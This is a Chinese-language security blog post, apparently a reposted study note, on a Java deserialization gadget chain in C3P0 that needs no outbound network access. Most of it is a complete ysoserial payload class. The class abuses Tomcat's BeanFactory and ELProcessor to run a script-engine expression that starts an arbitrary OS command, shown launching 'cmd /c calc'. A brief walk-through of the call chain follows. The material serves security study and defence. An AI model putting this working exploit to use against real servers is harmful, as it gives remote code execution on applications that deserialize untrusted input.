[Java安全]C3P0反序列化不出网利用学习
Posted Y4tacker
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[Java安全]C3P0反序列化不出网利用学习相关的知识,希望对你有一定的参考价值。
参考文章
本文复现了雨了个雨师傅的文章,思路很好,看完以后其实和JNDI8u191后的绕过思路一致,这个等下再复现学习
利用链构造
在昨天看了Ysoserial的基本过程以后其实这个就相对简单了,不一样的地方就是后面Ysoserial用了URLClassLoader,而这个是当前线程下的ClassLoader,曾经一直觉得没用,还是自己学的太少了,大佬想到通过Tomcat的getObjectInstance方法调用ELProcessor的eval方法实现表达式注入
package ysoserial.payloads;
import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import org.apache.naming.ResourceRef;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/**
yulegeyu modified
*/
@PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" )
@Dependencies( { "com.mchange:c3p0:0.9.5.2" ,"com.mchange:mchange-commons-java:0.2.11"} )
@Authors({ Authors.MBECHLER })
public class C3P0Tomcat implements ObjectPayload<Object> {
public Object getObject ( String command ) throws Exception {
PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource("org.apache.naming.factory.BeanFactory", null));
return b;
}
private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {
private String className;
private String url;
public PoolSource ( String className, String url ) {
this.className = className;
this.url = url;
}
public Reference getReference () throws NamingException {
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
ref.add(new StringRefAddr("forceString", "x=eval"));
String cmd = "calc";
ref.add(new StringRefAddr("x", "\\"\\".getClass().forName(\\"javax.script.ScriptEngineManager\\").newInstance().getEngineByName(\\"javascript\\").eval(\\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','"+ cmd +"']).start()\\")"));
return ref;
}
public PrintWriter getLogWriter () throws SQLException {return null;}
public void setLogWriter ( PrintWriter out ) throws SQLException {}
public void setLoginTimeout ( int seconds ) throws SQLException {}
public int getLoginTimeout () throws SQLException {return 0;}
public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;}
public PooledConnection getPooledConnection () throws SQLException {return null;}
public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}
}
public static void main ( final String[] args ) throws Exception {
PayloadRunner.run(C3P0Tomcat.class, new String[]{"calc"});
}
}
利用链分析
有些细节就不扣了,在Ysoserial那篇分析过了,简单来跟踪下调用链,PoolBackedDataSourceBase
的readObject
首先第一个恢复出的对象ReferenceSerialized
是IndirectlySerialized
的实例
跟进getObject
的调用,继续跟进referenceToObject
不同于之前,这次我们让var11
为null
这里实例化了org.apache.naming.factory.BeanFactory
就入上面所说的
org.apache.naming.factory.BeanFactory
在getObjectInstance()
中会通过反射的方式实例化Reference
所指向的任意Bean Class
,并且会调用setter
方法为所有的属性赋值。
而该Bean Class
的类名、属性、属性值,全都来自于Reference
对象,均是攻击者可控的
反射调用
可以看到这里成功触发
以上是关于[Java安全]C3P0反序列化不出网利用学习的主要内容,如果未能解决你的问题,请参考以下文章
[Java安全]Java反序列化C3P0之利用URLClassLoader
[Java安全]Java反序列化C3P0之利用URLClassLoader